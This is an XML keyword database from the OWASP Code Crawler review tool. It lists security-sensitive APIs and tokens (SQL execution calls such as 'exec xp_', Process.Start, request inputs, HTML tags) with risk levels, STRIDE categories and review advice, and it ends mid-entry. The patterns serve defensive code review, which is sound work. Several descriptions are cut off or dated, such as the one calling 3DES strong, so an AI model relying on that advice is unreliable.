@boyter
Created July 8, 2016 06:35
OWASP Code Crawler Database
<?xml version="1.0" encoding="UTF-8"?>
<!--
Project : OWASP Code Crawler
Company : Open Web Application Security Project
Developer: Tripurari Rai / Alessio Marziali
Last Update : 05 25 2008
-->
<CodeCrawlerDatabase>
<KeyPointer>
<k_name>Trace.Warn</k_name>
<k_level>3</k_level>
<k_description>Trace should be disabled in the production environment and should be used only for debugging. Ensure you are not providing sensitive information.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Diagnostic.Process.Start</k_name>
<k_level>3</k_level>
<k_description>This k_name may be vulnerable to command injection attacks or OS injection attacks. Java linking to the native OS can cause serious issues and potentially give rise to total server compromise.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>delete</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec sp_executesql</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>delete from where</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec sp_</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec xp_</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec @</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>executestatement</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>executeSQL</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>driver</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;meta&gt;</k_name>
<k_level>3</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.certificate</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.cookie</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.form</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.querystring</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.executeQuery</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.executeUpdate</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.jsp.JspWriter.print</k_name>
<k_level>3</k_level>
<k_description>Can lead to Cross Site Scripting.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.ServletOutputStream.print</k_name>
<k_level>3</k_level>
<k_description>Can lead to Cross Site Scripting</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.http.Cookie</k_name>
<k_level>3</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.</k_name>
<k_level>3</k_level>
<k_description>These API calls may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely, as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;body&gt;</k_name>
<k_level>3</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;object&gt;</k_name>
<k_level>3</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>DataSource</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>New OleDbConnection</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ADODB.recordset</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.Open</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.Provider</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Server.CreateObject</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ReflectionPermission.MemberAccess</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>sql server</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>sqloledb</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>adodb</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>GetQueryResultInXML</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>enableViewState</k_name>
<k_level>2</k_level>
<k_description>It is important to note that many settings in machine.config can be overridden in the web.config file of a particular application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>setfilter</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SqlCommand</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Microsoft.Jet</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SqlDataReader</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>GetString</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SqlDataAdapter</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CommandType</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StoredProcedure</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Data.Sql</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine whether the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;applet&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>RC2</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Random</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Random</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Security.Cryptography</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;ilayer&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ProtectedMemory</k_name>
<k_level>2</k_level>
<k_description>If sensitive data is stored in memory, it is recommended to use the following.</k_description>
